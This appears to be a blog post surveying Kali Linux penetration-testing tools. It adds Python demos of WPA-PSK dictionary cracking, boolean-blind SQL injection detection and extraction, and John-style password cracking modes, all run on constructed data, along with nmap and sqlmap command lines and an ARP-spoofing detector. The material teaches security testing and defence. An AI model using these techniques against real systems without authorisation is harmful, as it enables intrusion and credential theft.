Kali Linux is the successor to the ever-popular BackTrack penetration testing distribution. Its creators kept Kali's layout very close to BackTrack's, so anyone familiar with the older platform will feel right at home.
Kali includes more than 500 security testing tools. Many of the redundant tools from BackTrack were removed and the menus streamlined: the most used tools are one click away in the "Top 10 Security Tools" menu, and those and the rest are neatly categorised in the application menu.
Kali lets you use the same tools and techniques an attacker would use against your network, so you can find and fix weaknesses before a real attacker finds them.
The tools that come preinstalled in every Kali release range from Aircrack-ng to the Metasploit Framework and are the established staples of the field, among them:
- Metasploit Framework
- BeEF Framework
- John The Ripper
Besides the core penetration testing tools, Kali Linux also comes with tools for the following:
- Wireless attacks: This category includes tools to attack Bluetooth, RFID/NFC, and wireless devices.
- Reverse engineering: This category contains tools that can be used to debug a program or disassemble an executable file.
- Stress testing: This category contains tools that can be used to help you in stress testing your network, wireless, Web, and VOIP environment.
- Hardware hacking: Tools in this category can be used if you want to work with Android and Arduino applications.
- Forensics: In this category you will find tools for digital forensics, such as acquiring a hard disk image, carving files, and analysing the image. To use them properly, boot Kali from the live image and pick Kali Linux Forensics | No Drives or Swap Mount in the boot menu: in this mode Kali will not mount internal drives automatically or touch their swap partitions, which helps preserve the drives' integrity. This is only a software precaution, though; for anything that may end up as evidence, still put a hardware write blocker between Kali and the suspect drive and hash the image as soon as it is acquired.
Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data packets have been captured. For WEP it implements the standard FMS attack along with optimisations such as the KoreK attacks and the PTW attack, which needs far fewer captured packets and makes it much faster than older WEP cracking tools. WPA/WPA2-PSK has no such statistical shortcut: Aircrack-ng needs a captured four-way handshake between a client and the access point and then runs a dictionary attack against it, so success depends entirely on the passphrase being in your wordlist.
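To see what that dictionary attack actually costs, here is an added Python example (not Aircrack-ng's own code) that derives the WPA pairwise master key exactly as 802.11i specifies and checks candidates against the published IEEE test vector in place of a captured handshake. The wordlist is constructed for the example; with a real capture the comparison would be against the handshake's MIC rather than a bare PMK, but the expensive PBKDF2 step is the same.

```python
import hashlib


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes), per IEEE 802.11i.

    The SSID acts as the salt, so a precomputed table only helps against one network name.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


# IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE".
TEST_SSID = "IEEE"
TEST_PMK = bytes.fromhex(
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
)


def crack_wpa_psk(ssid: str, target_pmk: bytes, wordlist):
    """Dictionary attack: return (passphrase, candidates_hashed) or (None, candidates_hashed)."""
    tried = 0
    for cand in wordlist:
        # WPA passphrases are 8-63 ASCII characters; anything else cannot be the key,
        # so skip it before paying for the 4096 HMAC iterations.
        if not 8 <= len(cand) <= 63:
            continue
        tried += 1
        if wpa_pmk(cand, ssid) == target_pmk:
            return cand, tried
    return None, tried


# Constructed wordlist for the example; only "password" matches the test vector.
WORDLIST = ["admin", "letmein", "qwerty123", "password", "correcthorse"]

if __name__ == "__main__":
    found, tried = crack_wpa_psk(TEST_SSID, TEST_PMK, WORDLIST)
    print(f"passphrase={found!r} after hashing {tried} candidates")
```

Each candidate costs 4096 HMAC-SHA1 computations, which is why WPA-PSK cracking is measured in thousands of candidates per second on a CPU rather than the millions you get for unsalted fast hashes, and why wordlist quality matters more than raw speed.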
Metasploit is a penetration testing platform that lets you find, exploit, and validate vulnerabilities. The project also publishes information about security vulnerabilities and how to exploit them, which makes it just as useful to attackers; what separates the two uses is authorisation, not the tool.
It is one of the most complete frameworks a security testing company can have: a playground loaded with over a thousand exploits, hundreds of payloads and multiple encoders.
Metasploit can be a little confusing if you have never used it before, but once you get used to how it works you can do some amazing things with it.
Kali Linux has an abundant amount of tools readily available at a moment's notice, but the real power of these tools only shows when they are used properly and in the right order. When testing web applications, the methodology is no different from the first three phases of the hacker methodology: recon, scanning, and exploitation.
For example, WPScan is used specifically against WordPress CMS applications.
WPScan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.
Nmap is first and foremost a network discovery tool. It finds live hosts, reports their open ports and the services behind them, and can often identify the operating system and even what kind of firewall or filtering sits in front of a host. It was made for security auditing and network management, but it is just as useful to an attacker, because everything it reports about a target is learned from nothing more than the target's IP address.
One of the first steps most security testers take is an Nmap scan to determine which ports are open and, if possible, which services and versions are listening on them. Knowing the exact service version lets you look up known vulnerabilities and pick the right exploit; it does not guarantee that one exists, but it turns a blind attack into a targeted one.
Nmap also has a GUI version called Zenmap, which can be invoked by issuing the command zenmap at the terminal window or by going to Applications | Kali Linux | Information Gathering | Network Scanners | zenmap.
For example, if we want to fingerprint the operating system used on the 192.168.20.128 machine, we use the following command:
Command: nmap -O 192.168.20.128
OS detection sends raw packets, so run it as root (or with sudo). Add -sV to get service versions in the same scan, or -A to combine OS detection, version detection, the default scripts and traceroute.
Besides being used as a port scanner, Nmap has several other capabilities as follows:
- Host discovery: Nmap can be used to find live hosts on the target systems. By default, Nmap will send an ICMP echo request, a TCP SYN packet to port 443, a TCP ACK packet to port 80, and an ICMP timestamp request to carry out the host discovery.
- Service/version detection: After Nmap has discovered the ports, it can further check for the service protocol, the application name, and the version number used on the target machine.
- Operating system detection: Nmap sends a series of packets to the remote host and examines the responses. Then, it compares these responses with its operating system fingerprint database and prints out the details if there is a match. If it is not able to determine the operating system, Nmap will provide a URL where you can submit the fingerprint to update its operating system fingerprint database. Of course, you should submit the fingerprint if you know the operating system used on the target system.
- Network traceroute: Nmap uses the results of the scan to pick the port and protocol most likely to reach the target, then traces the path to it. Unlike the classic traceroute, it starts with a high Time to Live (TTL) and decrements it, which lets it stop early once it reaches hops that earlier traces already mapped.
- Nmap Scripting Engine (NSE): With this feature, Nmap can be extended with scripts written in Lua. If you want a check that Nmap does not include by default, you can write it yourself; hundreds of scripts already ship with Nmap for vulnerability checks, brute forcing and enumerating resources on the target. -sC runs the default set, and --script with a script or category name (for example --script vuln) selects others.
Wireshark is the world's foremost network protocol analyser and one of the most used tools in Kali Linux. It was formerly known as Ethereal.
Wireshark is a network packet analyser. It is one of the best tools for learning how protocols work because it decodes captured packets into human-readable form, with deep inspection of hundreds of protocols. It can capture live from an interface or read saved capture files offline.
It also supports decryption for many protocols, including 802.11 WEP, WPA and WPA2, provided you give it the key: for WPA/WPA2-PSK you must also have captured the client's four-way (EAPOL) handshake, otherwise Wireshark cannot derive the per-session keys and the data frames stay encrypted. The same applies to TLS, where it needs the session secrets (for example from an SSLKEYLOGFILE) or, for RSA key exchange only, the server's private key.
Wireshark's user interface is built with Qt (older versions used GTK+) and it captures packets with libpcap. It operates much like tcpdump, but as a graphical front end with integrated sorting and filtering.
Sqlmap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws, up to and including taking over the database server.
It comes with a powerful detection engine (boolean-based blind, time-based blind, error-based, UNION-based, stacked queries and out-of-band techniques), many niche features for the penetration tester, and a broad range of switches ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
The basic syntax is sqlmap -u URL --option, for example sqlmap -u "http://target/item.php?id=1" --dbs to test the id parameter and, if it is injectable, list the databases. Sqlmap is noisy and its higher --risk levels can modify data, so run it only against targets you are authorised to test.
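To show what sqlmap's boolean-based blind detection does under the hood, here is an added Python example (not sqlmap's code) with a vulnerable SQLite lookup, the true/false comparison that flags it, a character-by-character blind extraction that uses nothing but that same/different signal, and the parameterised version of the lookup that the same check reports as clean. The database and its two users are constructed for the example.

```python
import sqlite3
import string


def build_db():
    """Constructed in-memory database standing in for the application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (name, email) VALUES (?, ?)",
                     [("alice", "alice@example.test"), ("bob", "bob@example.test")])
    return conn


def lookup_vulnerable(conn, name):
    """Vulnerable: the input is spliced into the SQL text."""
    sql = "SELECT email FROM users WHERE name = '%s'" % name
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, name):
    """Fixed: the input is bound as a parameter and can never change the query structure."""
    return [row[0] for row in conn.execute("SELECT email FROM users WHERE name = ?", (name,))]


def probe(query_fn, value):
    """Reduce a query to a comparable 'response'; a database error is a response too."""
    try:
        return ("ok", tuple(query_fn(value)))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)


def detect_boolean_blind(query_fn, base_value):
    """Boolean-based blind check: a true condition must leave the response unchanged
    and a false condition must change it. Injectable only if both hold."""
    baseline = probe(query_fn, base_value)
    true_resp = probe(query_fn, base_value + "' AND 1=1 --")
    false_resp = probe(query_fn, base_value + "' AND 1=2 --")
    return true_resp == baseline and false_resp != baseline


def blind_extract(query_fn, base_value, subquery,
                  alphabet=string.ascii_lowercase + string.digits, max_len=32):
    """Pull a string out one character at a time using only 'same as baseline' or not."""
    baseline = probe(query_fn, base_value)
    result = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = f"{base_value}' AND substr(({subquery}),{pos},1)='{ch}' --"
            if probe(query_fn, payload) == baseline:
                result += ch
                break
        else:
            break  # no character matched at this position: end of the string
    return result


if __name__ == "__main__":
    conn = build_db()
    vuln = lambda v: lookup_vulnerable(conn, v)
    print("vulnerable injectable:", detect_boolean_blind(vuln, "alice"))
    print("extracted:", blind_extract(vuln, "alice", "SELECT name FROM users WHERE id=2"))
    print("safe injectable:", detect_boolean_blind(lambda v: lookup_safe(conn, v), "alice"))
```

The extraction loop is deliberately slow (one request per candidate character per position); sqlmap narrows it with a binary search on the character code, but the signal it relies on is exactly this one.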
Ettercap is a free, open-source suite for man-in-the-middle attacks on a LAN; it also does protocol analysis and security auditing, and it runs on Linux, Mac OS X, BSD, Solaris and Microsoft Windows.
It positions itself between two hosts by poisoning their ARP caches (ARP spoofing), so that each sends the traffic meant for the other to the attacker's MAC address. Once it achieves this, it is able to do the following:
- Modify data in passing connections
- Capture credentials for plaintext protocols such as FTP, HTTP, POP and SSH1
- Present forged SSL certificates to intercept the victim's HTTPS sessions (modern browsers show a certificate warning and HSTS-protected sites will not let the user click through, so this works mainly against old or misconfigured clients)
Ettercap comes with three modes of operation: text mode, curses mode, and graphical mode using GTK.
- To start Ettercap in text mode, use the console to execute the following command: # ettercap -T
- To start Ettercap in curses mode, use the console to execute the following command: # ettercap -C
- To start Ettercap in graphical mode, use the console to execute the following command: # ettercap -G
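The flip side for a defender is spotting the ARP poisoning Ettercap relies on. This added Python example (not Ettercap's or arpwatch's code) applies the classic checks, an IP address that suddenly changes MAC address and one MAC answering for several IP addresses, to a constructed list of ARP replies that mimics the poisoning sequence described above.

```python
from collections import defaultdict

# Constructed ARP reply records (time, sender IP, sender MAC); not a real capture.
ARP_REPLIES = [
    (1.0, "192.168.20.1",   "00:11:22:33:44:01"),  # gateway, legitimate
    (1.5, "192.168.20.128", "00:11:22:33:44:80"),  # victim host, legitimate
    (2.0, "192.168.20.50",  "de:ad:be:ef:00:01"),  # attacker's own address
    (3.0, "192.168.20.1",   "de:ad:be:ef:00:01"),  # attacker claims the gateway
    (3.1, "192.168.20.128", "de:ad:be:ef:00:01"),  # attacker claims the victim
    (3.2, "192.168.20.1",   "de:ad:be:ef:00:01"),  # poisoning is repeated to keep caches fresh
]


def detect_arp_spoofing(replies, trusted=None):
    """Return alerts (time, ip, previously_seen_mac, new_mac) for every IP->MAC change.

    `trusted` seeds the expected table (e.g. the gateway's real MAC) so the detector does not
    simply believe the first reply it happens to see.
    """
    table = dict(trusted or {})
    alerts = []
    for ts, ip, mac in replies:
        known = table.get(ip)
        if known is None:
            table[ip] = mac  # first claim is recorded, as a host's ARP cache would
        elif known != mac:
            alerts.append((ts, ip, known, mac))  # keep the original binding, flag the change
    return alerts


def macs_claiming_multiple_ips(replies):
    """A single MAC answering for several IPs is the signature of a MITM between them."""
    claims = defaultdict(set)
    for _, ip, mac in replies:
        claims[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in claims.items() if len(ips) > 1}


if __name__ == "__main__":
    for alert in detect_arp_spoofing(ARP_REPLIES, trusted={"192.168.20.1": "00:11:22:33:44:01"}):
        print("ARP change:", alert)
    print("multi-IP MACs:", macs_claiming_multiple_ips(ARP_REPLIES))
```

In production this logic lives in arpwatch or the switch's dynamic ARP inspection; static ARP entries for the gateway on critical hosts remove the attack rather than just detecting it.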
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. BeEF can be very interesting to play with and fairly easy to use once you get the hang of it.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors.
Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
BeEF's modules can, among other things:
- Fingerprint and perform reconnaissance on hooked browsers.
- Detect installed software on the client (for example on Internet Explorer) and list directories under Program Files.
- Take photos with the hooked system's webcam, if the user accepts the browser's permission prompt.
- Search the victim's files and steal data that may contain secrets.
- Log keystrokes typed into the hooked page.
Social engineering attacks are one of the top techniques used against networks today. Why spend days, weeks or even months trying to penetrate layers of network security when you can trick a user into running a file that gives you full access to their machine and slips past anti-virus, firewalls and many intrusion detection systems?
This is what most phishing attacks do today: craft an e-mail, or build a fake website, that tricks users into running a malicious file which plants a backdoor on their system. But as a security expert, how do you test this against your own network? Would such an attack work, and how would you defend against it?
The Social-Engineer Toolkit is an open-source penetration testing framework designed for Social-Engineering. SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of the time.
The Social Engineering Toolkit is truly a robust and feature-rich tool for any corporate security testing team.
Some of the most efficient and useful attack methods employed by SET include targeted phishing e-mails with a malicious file attachment, Java applet attacks, browser-based exploitation, gathering website credentials, creating infectious portable media (USB/DVD/CD), mass-mailer attacks, and other similar multi-attack web vectors.
This combination of attack methods provides you with a powerful platform to utilize and select the most persuasive technique that could perform an advanced attack against the human element.
10. John the Ripper
Cracking passwords is a task every penetration tester performs. The weakest part of most systems is the passwords chosen by users: whatever the password policy, people dislike typing strong passwords or changing them as often as they should, which makes password hashes an easy target.
John the Ripper is one of the fastest password crackers. It runs brute-force attacks, and dictionary attacks in which it takes each word from a wordlist, hashes it in the same format as the target hash (applying any mangling rules first), and compares the result against the hashes to be cracked.
It works against the hashed (often loosely called encrypted) passwords found on most UNIX systems and even against Windows LM hashes.
It can crack more than 40 hash types out of the box, such as DES-based crypt, MD5-crypt, LM, NT, NETLM and NETNTLM, and the community "jumbo" build adds hundreds more.
John supports the following four password cracking modes:
- Wordlist mode: In this mode you only need to supply the wordlist file and the password file to be cracked. A wordlist file is a text file containing the possible passwords, one per line. You can also enable rules so that John modifies each word (capitalising it, appending digits, and so on) according to the rule definitions.
- Single crack mode: This mode is suggested by John's author as the one to try first. In it, John uses the login name, the Full Name (GECOS) field and the user's home directory name as password candidates, with rules applied to them. These candidates are tried only against the account they were taken from, or against hashes with the same salt, so it is much faster than wordlist mode.
- Incremental mode: In this mode John tries all possible character combinations as the password. Although it is the most powerful cracking method, if you do not set a termination condition the process will take a very long time. Examples of termination conditions are a short maximum password length and a small character set.
- External mode: With this mode you define your own candidate generator. You create a configuration file section called [List.External:MODE], where MODE is the name you assign, containing functions written in a subset of the C programming language.
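The three built-in modes are easiest to understand side by side. This added Python example (not John's code; it uses a toy salted SHA-256 in place of John's hash formats and Python functions in place of john.conf rules) generates candidates the way single, wordlist and incremental mode do and tries them against three constructed accounts, each of which falls to a different mode.

```python
import hashlib
import itertools
import string


def hash_pw(salt: str, pw: str) -> str:
    """Toy salted hash standing in for a real crypt format."""
    return hashlib.sha256((salt + pw).encode()).hexdigest()


def make_account(login, gecos, salt, password):
    """Constructed passwd/shadow-style record: login, GECOS full name, salt, hash."""
    return {"login": login, "gecos": gecos, "salt": salt, "hash": hash_pw(salt, password)}


ACCOUNTS = [
    make_account("jsmith", "John Smith", "s1", "Smith1"),       # falls to single mode
    make_account("webadmin", "Web Admin", "s2", "Summer2019"),  # falls to wordlist + rules
    make_account("svc", "Service", "s3", "ab1"),                # falls to incremental
]


def apply_rules(word):
    """A few mangling rules of the kind John's [List.Rules:*] sections express."""
    yield word
    yield word.capitalize()
    for suffix in ("1", "123", "2019", "!"):
        yield word + suffix
        yield word.capitalize() + suffix


def try_candidates(account, candidates):
    """Hash each candidate with the target's salt and compare; None if exhausted."""
    for cand in candidates:
        if hash_pw(account["salt"], cand) == account["hash"]:
            return cand
    return None


def single_mode(account):
    """Candidates come from the account's own login and GECOS words, rules applied."""
    seeds = [account["login"]] + account["gecos"].split()
    cands = itertools.chain.from_iterable(apply_rules(s.lower()) for s in seeds)
    return try_candidates(account, cands)


def wordlist_mode(account, wordlist):
    """Every word in the list, plus every rule applied to it."""
    cands = itertools.chain.from_iterable(apply_rules(w) for w in wordlist)
    return try_candidates(account, cands)


def incremental_mode(account, charset=string.ascii_lowercase + string.digits, max_len=3):
    """Exhaustive search; charset and max_len are the termination conditions."""
    def candidates():
        for length in range(1, max_len + 1):
            for combo in itertools.product(charset, repeat=length):
                yield "".join(combo)
    return try_candidates(account, candidates())


if __name__ == "__main__":
    print("single:", single_mode(ACCOUNTS[0]))
    print("wordlist:", wordlist_mode(ACCOUNTS[1], ["password", "summer", "letmein"]))
    print("incremental:", incremental_mode(ACCOUNTS[2]))
```

Note why the order matters: single mode tries a few dozen candidates per account, wordlist mode a few million, and incremental mode grows as charset^max_len, so raising max_len from 3 to 8 with this 36-character set means roughly 2.8 trillion hashes.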
Feel free to leave a comment below or reach me on Instagram @iamshubhamkumar__.
Posted by Shubham ;)